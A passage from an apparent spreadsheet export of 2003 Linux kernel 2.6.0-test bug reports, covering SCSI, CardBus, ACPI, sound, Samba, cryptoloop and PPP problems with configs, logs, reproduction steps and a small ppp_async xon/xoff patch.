CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=m MARC: msg 'Presario oops on 2.6.0-test1' (p24 of 26) CONFIG_USB_OHCI_HCD=m CONFIG_USB_UHCI_HCD=m # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # # SCSI support is needed for USB Storage # # # USB Human Interface Devices (HID) # CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set # CONFIG_USB_HIDDEV is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support MARC: msg 'Presario oops on 2.6.0-test1' (p25 of 26) # # # USB Network adaptors # # CONFIG_USB_AX8817X is not set # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # CONFIG_USB_GADGET is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y MARC: msg 'Presario oops on 2.6.0-test1' (p26 of 26) CONFIG_DEBUG_SLAB=y CONFIG_DEBUG_IOVIRT=y CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y CONFIG_DEBUG_PAGEALLOC=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y # CONFIG_CRYPTO_NULL is not set # CONFIG_CRYPTO_MD4 is not set # CONFIG_CRYPTO_MD5 is not set # CONFIG_CRYPTO_SHA1 is not set # CONFIG_CRYPTO_SHA256 is not set # CONFIG_CRYPTO_SHA512 is not set # CONFIG_CRYPTO_DES is not set # CONFIG_CRYPTO_BLOWFISH is not set # CONFIG_CRYPTO_TWOFISH is not set # CONFIG_CRYPTO_SERPENT is not set # CONFIG_CRYPTO_AES is not set CONFIG_CRYPTO_DEFLATE=y # CONFIG_CRYPTO_TEST is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_X86_BIOS_REBOOT=y</t>
  </si>
  <si>
    <t>scsi errors at boot &amp; at +/- random time (Saw underflow (.....) Treated as error)</t>
  </si>
  <si>
    <t>2003-07-21 00:28 UTC</t>
  </si>
  <si>
    <t>2003-11-10 12:59 UTC</t>
  </si>
  <si>
    <t>Distribution: redhat 9 with minor updates to support kernel 2.6.0-test1 Hardware Environment: p3-1000 512 ram aha29160UW2 scsi drives: ]$ cat /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: WDIGTL Model: ENTERPRISE Rev: 1.61 Type: Direct-Access ANSI SCSI revision: 02 Host: scsi0 Channel: 00 Id: 01 Lun: 00 Vendor: PLEXTOR Model: CD-ROM PX-20TS Rev: 1.00 Type: CD-ROM ANSI SCSI revision: 02 Host: scsi0 Channel: 00 Id: 04 Lun: 00 Vendor: PLEXTOR Model: CD-R PX-W1210S Rev: 1.06 Type: CD-ROM ANSI SCSI revision: 02 Host: scsi0 Channel: 00 Id: 06 Lun: 00 Vendor: IBM Model: DDYS-T36950N Rev: S96H Type: Direct-Access ANSI SCSI revision: 03 Software Environment: onlyl rh9 needed, using modules: ]$ lsmod |grep -v snd Module Size Used by sr_mod 16896 0 cdrom 35904 1 sr_mod uhci_hcd 30920 0 nvidia 1614024 8 nfs 155404 1 i2c_viapro 5708 0 i2c_core 24580 1 i2c_viapro binfmt_misc 10632 1 parport_pc 27144 1 lp 10464 0 parport 44032 2 parport_pc,lp nfsd 162848 8 [unsafe] exportfs 6496 1 nfsd lockd 63056 3 nfs,nfsd,[unsafe] sunrpc 134820 5 nfs,nfsd,lockd iptable_filter 2592 0 ip_tables 18176 1 iptable_filter 8139too 22208 0 mii 5184 1 8139too crc32 4320 1 8139too ipv6 253504 13 nls_iso8859_1 3904 3 nls_cp437 5568 3 vfat 16160 3 fat 47872 1 vfat mousedev 8756 1 hid 33120 0 usbcore 110196 4 uhci_hcd,hid aic7xxx 212876 8 sd_mod 15616 8 scsi_mod 117268 3 sr_mod,aic7xxx,sd_mod Problem Description: when the computer boots, right before (or at the same moment?) that login is launched on the ttys i get these messages: (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x1a 0x0 0x1c 0x0 0xff 0x0 (scsi0:A:6:0): Saw underflow (231 of 255 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1010 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1010 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1010 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1010 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x40 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1010 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:0:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:0:0): Saw underflow (1014 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1012 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1012 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1012 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1012 of 1024 bytes). Treated as error (scsi0:A:6:0): CDB: 0x4d 0x0 0x6f 0x0 0x0 0x0 0x0 0x4 0x0 0x0 (scsi0:A:6:0): Saw underflow (1012 of 1024 bytes). Treated as error I don't know if this is really related to login, but i don't know the real trigger either. This did not happen in older 2.4 releases Steps to reproduce: boot the system, watch dmesg Sometimes happens when running other software too</t>
  </si>
  <si>
    <t>2.6.0-test1-bk2</t>
  </si>
  <si>
    <t>2003-07-21 01:27 UTC</t>
  </si>
  <si>
    <t>2003-09-03 23:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid (note that /etc/modules lists lots of extraneous modules, FWIW; I'll consider attaching it to this bug) Hardware Environment: 800MHz AMD Athlon MSI K7 Pro (MS-6195, I think) motherboard 512MB RAM Two network cards: ns83820-based, tulip-based I will attach lspci -vvxxx output to this bug. I will attach my .config as well. This system is rock solid stable under most 2.4 kernels (definitely including 2.4.21-ac4). Software Environment: gcc (GCC) 3.3.1 20030626 (Debian prerelease) binutils: 2.14.90.0.4 20030523 Debian GNU/Linux I haven't tried using gcc 2.95.3 to compile the kernel for this machine yet. My other x86 PC running a 2.6-test1 variant shows no stability difference between this compiler and gcc 2.95.3 though. Problem Description: I get an oops when the ns83820 driver gets modprobed during bootup. I'll attach the oops (and a couple of log lines before/after the oops) to this bug report. Steps to reproduce: Uhh, just boot the system? ;) Er, maybe it's not that simple... but I can't figure out what else might be involved, and in any case this is 100% reproducible for me.</t>
  </si>
  <si>
    <t>2.4.x, 2.6.x</t>
  </si>
  <si>
    <t>cu -l /dev/ttyS0 got a signal hangup in 2.5 and 2.6.0-test2 kernel</t>
  </si>
  <si>
    <t>2.6.0-test2</t>
  </si>
  <si>
    <t>2003-07-23 11:52 UTC</t>
  </si>
  <si>
    <t>Hien Nguyen</t>
  </si>
  <si>
    <t>2004-03-13 06:02 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE SLES8 Hardware Environment:NetVista 6579-A4U Pentium III - 866 MHz 256MB RAM Software Environment:2.5.75 kernel Problem Description: cu session fails to log into the other machine which is connected with a null modem serial cable between serial ports. It works fine in 2.4.19 4GB kernel Steps to reproduce: 1. connecting two systems with a null modem serial cable between serial ports. 2. On one machine, do : cu -l /dev/ttyS0 On other system, have /sbin/agetty -L 9600 ttyS0 vt100 running. and ttyS0 has been defined in /etc/securetty 3. cu session connected and showed you the login prompt. 4. Got a hangup signal and disconnected after typing "root" or any user ID. It supposes to prompt you "password:" to let you type the password of the other machine to login to that system.</t>
  </si>
  <si>
    <t>2.6 readme is still for 2.5</t>
  </si>
  <si>
    <t>linux-2.6.0-test1</t>
  </si>
  <si>
    <t>2003-07-23 19:36 UTC</t>
  </si>
  <si>
    <t>Carl Karsten</t>
  </si>
  <si>
    <t>2003-10-07 19:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: These are the release notes for Linux version 2.5. Read them carefully, Steps to reproduce: [carl@dev linux-2.6.0-test1]$ grep 2.5 README</t>
  </si>
  <si>
    <t>can not open "parport general" device</t>
  </si>
  <si>
    <t>from 2.5.x to 2.6.0-test1</t>
  </si>
  <si>
    <t>2003-07-24 00:22 UTC</t>
  </si>
  <si>
    <t>BenStone</t>
  </si>
  <si>
    <t>2003-11-13 18:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: HP CD_Writer Plus 7500 serials Software Environment: Linux kernel 2.6.0-test1 Problem Description: device was busy whenever open device "/dev/pg/0" Steps to reproduce: insert module of epat and pg, run "cat /dev/pg/0"</t>
  </si>
  <si>
    <t>CardBus functions (a) not seen, and (b) misconfigured</t>
  </si>
  <si>
    <t>2.6.0-test1bk (as of 7/24 am)</t>
  </si>
  <si>
    <t>2003-07-24 09:46 UTC</t>
  </si>
  <si>
    <t>2003-11-03 13:00 UTC</t>
  </si>
  <si>
    <t>Distribution: RH9 Hardware Environment: Dell Inspiron Laptop generic NEC USB 2.0 card (ehci + 2 ohci) "lspci" reports two TI PCI1420 CardBus bridges. Software Environment: RH9 + 2.6.0-test1bk Problem Description: This problem started to appear relatively recently, perhaps 2.5.70 or so. Before that, this hardware had been really useful for 2.5 development; the problem is clearly a software regression, it still behaves on 2.4. The first failure mode I noticed is no longer seen in the latest kernel, but I'll mention it because someone may get insight from it. If the cardbus device was connected when the system booted, it worked as usual ... but if that card was inserted afterward, there were TWO copies of each function, with the same PCI slot name. That is: two 02:00.{0,1,2} existed. It's possible that once or twice the system actually could use those devices, but as a rule they were unusable. The current (2.6.0-test1bk) failure mode is different in two ways. First, it doesn't matter whether the device is present at boot time or not; the same failure happens in both cases. It's _always_ broken. Second, the failure mode is different. (And FWIW, "acpi=off" or not doesn't matter.) I rebuilt a kernel with drivers/pci/probe.c #defining DEBUG, and to summarize the results: - "Found 02:00 [1033/0035] 000c03 00" ... presumably this is the first of the two OHCI controllers. But this comes up unusable; registers aren't quite total nonsense, but they don't work correctly. - "Found 02:02 [1033/00e0] 000c03 7f" ... presumably this is the third controller (EHCI), but it's ignored/unusable. In short, none of the three PCI functions on this card are accessible; Only one of them is seen; and that one's not even initialized correctly. Steps to reproduce: Boot, with or without the Cardbus adapter installed. "lspci" shows only one of the three USB controllers. "modprobe ohci-hcd" produces lots of root hub initialization errors. Or in short, this hardware combination is no longer usable. It's a significant regression, for pretty generic hardware.</t>
  </si>
  <si>
    <t>2003-07-25 12:58 UTC</t>
  </si>
  <si>
    <t>2003-12-18 09:09 UTC</t>
  </si>
  <si>
    <t>Steve French</t>
  </si>
  <si>
    <t>Distribution:RedHat 8.0 (psyche) Hardware Environment: SAMBA server:IBM NetVista, UP, Pentium-III (866MHz), 256MB RAM. Kernel: 2.6.0-test1. The hard drive has the following partitions: /dev/hda6 1.9G 33M 1.7G 2% /fsext3 /dev/hda7 2.0G 33M 1.9G 2% /fsreiser /dev/hda8 3.4G 568K 3.4G 1% /fsjfs /dev/hda5 1.9G 20K 1.8G 1% /fsext2 2 SAMBA Clients: Basically both are IBM NetVistas, UP, Pentium-III (866MHz), 256 MB RAM. Kernel: 2.6.0-test1. One of the SAMBA had the SAMBA fsext2 and fsreiser partitions mounted, while the other client had the fsext3 and fsjfs mounted. Software Environment: samba-2.2.8a (downloaded from www.samba.org) was used. ltp was obtained from ltp.sf.net. fsstress is a part of the ltp test suite. Problem Description: When fsstress test was executed (directed specifically against a directory, in this case it is a samba volume), the test did not go to completion. Besides, the directory could not accessed by using the commands cd, ls, df -h. The same observation was also made on the SAMBA server side too. The same fsstress could be run by others successfully on various filesystems including NFS. The directory acces problem and the application hang is observed mostly on the ext3, JFS, reiserfs. With ext2 it happens quite on and off. Steps to reproduce: Install and configure kernel-2.6.0-test1 suitable so that the SAMBA and CIFS support is enabled. This step is followed on both server and client sides. On the server side install SAMBA server and configure with the volumes that would be mounted on the client side as shares. Modify the directory file access permissions such that the samba clients can mount, read, write, etc. on those mounted volumes. On the clients install LTP test-suite. cd &lt;ltpdir&gt;/kernel/fs/fsstress. Execute make, make install commands. Mount two samba volumes. cd to the fsstress directory and execute the command fsstress -n 100 and -p 50. n is for number of operations and p for number of processes. Actual result should be that the application executes a variety of filesystem related commands/operations and goes to completion. Also while the test is executed those directories should be accessible and the commands like ls, df should be executed.</t>
  </si>
  <si>
    <t>ac97 dumps messages on console (but working)</t>
  </si>
  <si>
    <t>2003-07-26 00:27 UTC</t>
  </si>
  <si>
    <t>Robins Tharakan</t>
  </si>
  <si>
    <t>2004-03-05 00:28 UTC</t>
  </si>
  <si>
    <t>Distribution: rh8.0 Hardware Environment: athlon 1000,via motherboard, ac97 sound card, Software Environment:kernel 2.6.0-test1 Problem Description: sound is very jittery sometimes (example while compiling the kernel) infact so much that it stops for a second sometimes...(while the compile is doing LD or somethings like that...)... it also dumps messages on console and to dmesg... dmesg output is attached. Steps to reproduce: i guess simply compile 2.6.0-test1 my config file is submitted for another (acpi-thermal) error... the attachment number is 596 at bugme.osdl.org and playing songs using xmms, mp3 file was in play when this error was noticed..(if that helps!! :) affly</t>
  </si>
  <si>
    <t>/proc/acpi files appear in /proc after ACPI init failure</t>
  </si>
  <si>
    <t>2003-07-26 09:26 UTC</t>
  </si>
  <si>
    <t>Alex Galakhov</t>
  </si>
  <si>
    <t>2004-03-04 19:55 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid unofficial/unstable + kernel 2.6.0-test1 from kernel.org source Hardware Environment: Tyan Thunder II motherboard, 2xP2 CPUs Software Environment: See distribution Problem Description: The /proc/acpi directory does not exist. ACPI stuff that's usually in /proc/acpi is placed directly in /proc and seems to be not working (these directories are empty). All the ACPI stuff is compiled into the kernel (not modules). ACPI reports warnings about ACPI tables while booting. Steps to reproduce: Just boot the system and look at /proc/ after it is mounted.</t>
  </si>
  <si>
    <t>Documentation/Changes still reads 2.5</t>
  </si>
  <si>
    <t>2.6.0-test{1,2}</t>
  </si>
  <si>
    <t>2003-07-27 12:27 UTC</t>
  </si>
  <si>
    <t>Problem Description: Documentation/Changes still reads 2.5 (insead of 2.6) Steps to reproduce: $ grep '2.5' Documentation/Changes</t>
  </si>
  <si>
    <t>ppp_async doesn't handle xon/xoff</t>
  </si>
  <si>
    <t>since 2.0 at least</t>
  </si>
  <si>
    <t>2003-07-27 23:10 UTC</t>
  </si>
  <si>
    <t>Samuel Thibault</t>
  </si>
  <si>
    <t>2003-08-04 17:22 UTC</t>
  </si>
  <si>
    <t>Paul Mackerras</t>
  </si>
  <si>
    <t>Software Environment: pppd, any version Problem Description: linux' ppp implementation doesn't handle xon/xoff characters at all Steps to reproduce: pppd xonxoff passive then try to stop the flow with ^S. The problem is that, as a line discipline, the asynchronous ppp layer should handle xon/xoff characters itself, just like n_tty.c does. Some serial chipset can handle xon/xoff themselves, but 8250/16450 can't for instance, so ppp_async.c should do it itself. Here is a patch to correct this, it is really much like a cut &amp; paste of n_tty.c's handling. The character handling is done at the same level as Escape characters handling, so it copes correctly with the accm. It was very well tested under kernel 2.2, 2.4 and now 2.5/2.6. Fix xon/xoff support to the ppp line discipline for async ports. --- linux-2.6.0-test1-orig/drivers/char/tty_io.c 2003-07-26 17:25:28.000000000 -0400 +++ linux-2.6.0-test1-perso/drivers/char/tty_io.c 2003-07-14 01:11:25.000000000 -0400 @@ -611,6 +611,8 @@ (tty-&gt;driver-&gt;stop)(tty); } +EXPORT_SYMBOL(stop_tty); + void start_tty(struct tty_struct *tty) { if (!tty-&gt;stopped || tty-&gt;flow_stopped) @@ -629,6 +631,8 @@ wake_up_interruptible(&amp;tty-&gt;write_wait); } +EXPORT_SYMBOL(start_tty); + static ssize_t tty_read(struct file * file, char * buf, size_t count, loff_t *ppos) { --- linux-2.6.0-test1-orig/drivers/net/ppp_async.c 2003-07-26 17:23:56.000000000 -0400 +++ linux-2.6.0-test1-perso/drivers/net/ppp_async.c 2003-07-14 01:12:45.000000000 -0400 @@ -891,6 +891,11 @@ process_input_packet(ap); } else if (c == PPP_ESCAPE) { ap-&gt;state |= SC_ESCAPE; + } else if (I_IXON(ap-&gt;tty)) { + if (c == START_CHAR(ap-&gt;tty)) + start_tty(ap-&gt;tty); + else if (c == STOP_CHAR(ap-&gt;tty)) + stop_tty(ap-&gt;tty); } /* otherwise it's a char in the recv ACCM */ ++n;</t>
  </si>
  <si>
    <t>file corruption using cryptoloop on ext2/ext3/other file systems</t>
  </si>
  <si>
    <t>2003-07-28 10:14 UTC</t>
  </si>
  <si>
    <t>Mike</t>
  </si>
  <si>
    <t>2003-09-08 03:15 UTC</t>
  </si>
  <si>
    <t>Distribution: unstable debian (util-linux 2.12) Hardware Environment: AMD K7 Software Environment: Problem Description: Using cryptoloop, any files copied to ext2/ext3, and from what I hear anything other than msdos/vfat (vfat verified), leaves files corrupted. # this talks about files larger than system memory, but I see this with files # of any size. http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=105932373007928&amp;w=2 http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=105873721209176&amp;w=2 Steps to reproduce: losetup /dev/loop0 /dev/hdX -e aes mkfs -t ext3 /dev/loop0 mount /dev/loop0 /mnt cp /tmp/some.mp3 /mnt umount /mnt losetup -d /dev/loop0 md5sum /tmp/some.mp3 losetup /dev/loop0 /dev/hdX -e aes mount /dev/loop0 /mnt md5sum /mnt/some.mp3 While the fs is mounted, everything checks out ok, but as soon as you unmount and remount, it's all messed up. I created a 10MB test file, and instead of using a drive/partition as above, I used the file. ext2 on there worked ok, so I don't know if it's something over a certain size or what.</t>
  </si>
  <si>
    <t>2.6.0-test2: delay timer typo/thinko</t>
  </si>
  <si>
    <t>2003-07-28 15:21 UTC</t>
  </si>
  <si>
    <t>2004-03-03 21:48 UTC</t>
  </si>
  <si>
    <t>In drivers/acpi/hardware/hwsleep.c/acpi_enter_sleep_state(), we have: /* * Wait a second, then try again. This is to get S4/5 to work on all mac hines. */ if (sleep_state &gt; ACPI_STATE_S3) { /* * We wait so long to allow chipsets that poll this reg very slo wly to * still read the right value. Ideally, this entire block would go * away entirely. */ acpi_os_stall (10000000); status = acpi_hw_register_write (ACPI_MTX_DO_NOT_LOCK, ACPI_REGI STER_PM1_CONTROL, sleep_enable_reg_info-&gt;access_bit_mask); if (ACPI_FAILURE (status)) { return_ACPI_STATUS (status); } } Well, I assume if the comment says to wait a second, then we're supposed to wait one second, right? If so, then we should probably use 1000000 for acpi_os_stall(), not 10000000 (10 seconds!). (I had inserted acpi_os_stall()s of 20000000 at various places in this function, and that's how I discovered that something cannot be quite right...)</t>
  </si>
  <si>
    <t>ALSA  VIA SOUND DRIVER CHIRPS AND IS DISTORTED</t>
  </si>
  <si>
    <t>2.6.0-test1 2.6.0-test2 2.6,0-test3</t>
  </si>
  <si>
    <t>2003-07-28 16:11 UTC</t>
  </si>
  <si>
    <t>Daniel Goller</t>
  </si>
  <si>
    <t>2003-10-26 08:38 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo 1.4rc4 Hardware Environment: Biostar M7VIW (KT266A chipset), 512MB DDR333, on board VIA AC97 sound Software Environment: anything playing sound Problem Description: when playing wavs or mp3s (Short anything pcm) the output is distorted also there is a static chirping on the speakers the chirping seem to be concentrating on one side of the speakers right side for me, when balance is moved to right, only chirping is heard, no sound, when moved to left chirping becomes less noticable and mostly only pcm is heard there seems to be no difference between stereo and mono controls on this Steps to reproduce: running any player that plays pcm sounds mplayer,zinf,for example NOTE: same environment but using OSS drivers for same sound controller results in crystal clear sound from the same applications playing the same files</t>
  </si>
  <si>
    <t>No data gets through pppd 2.4.1 w/2.6 kernel w/compression</t>
  </si>
  <si>
    <t>2.6test2 (also test1)</t>
  </si>
  <si>
    <t>2003-07-28 16:39 UTC</t>
  </si>
  <si>
    <t>Robert Shideleff</t>
  </si>
  <si>
    <t>2003-09-09 10:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Athlon-xp Compaq Presario 2100 Laptop Software Environment: Problem Description: I use pppd over ssh to vpn into my home network. This works fine with 2.4 series kernels. On 2.6-test series kernels, the connection is apparently successful but no data can be transmitted. Pings to addresses are successful, including via routes through the connection. However, dns queries, ssh connections (directly addressed, since dns doesn't work), and web page hits (likewise), all don't work. In fact nothing seems to work except ping. Steps to reproduce: The server is running a 2.4 kernel with pppd 2.4.1. ------------------------ pppd Command: ------------------------ /usr/sbin/pppd updetach noauth passive pty "ssh -C xxx.com sudo /usr/sbin/pppd nodetach notty noauth" ipparam vpn 192.168.3.200:192.168.3.201 &gt;/dev/null 2&gt;/dev/null -------------------- ip-up File: -------------------- cat /etc/ppp/ip-up #!/bin/sh if [ $6 = "vpn" ] ; then /sbin/route add xxx.com gw 192.168.63.1 /sbin/route del default /sbin/route add default gw $5 /sbin/route add webmail gw 192.168.63.1 cp /etc/resolv.conf /etc/resolv.conf.pppd.save echo domain xxx.com &gt;/etc/resolv.conf echo nameserver 192.168.0.1 &gt;&gt;/etc/resolv.conf fi --------- Log --------- Jul 28 18:08:55 [pppd] pppd 2.4.1 started by root, uid 0 Jul 28 18:08:55 [pppd] Using interface ppp0 Jul 28 18:08:55 [pppd] Connect: ppp0 &lt;--&gt; /dev/pts/0 Jul 28 18:08:58 [pppd] local IP address 192.168.3.200 Jul 28 18:08:58 [pppd] remote IP address 192.168.3.201 Jul 28 18:08:58 [pppd] Deflate (14) compression enabled ---------------- 2.6 .config ---------------- # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y # CONFIG_MODVERSIONS is not set CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set 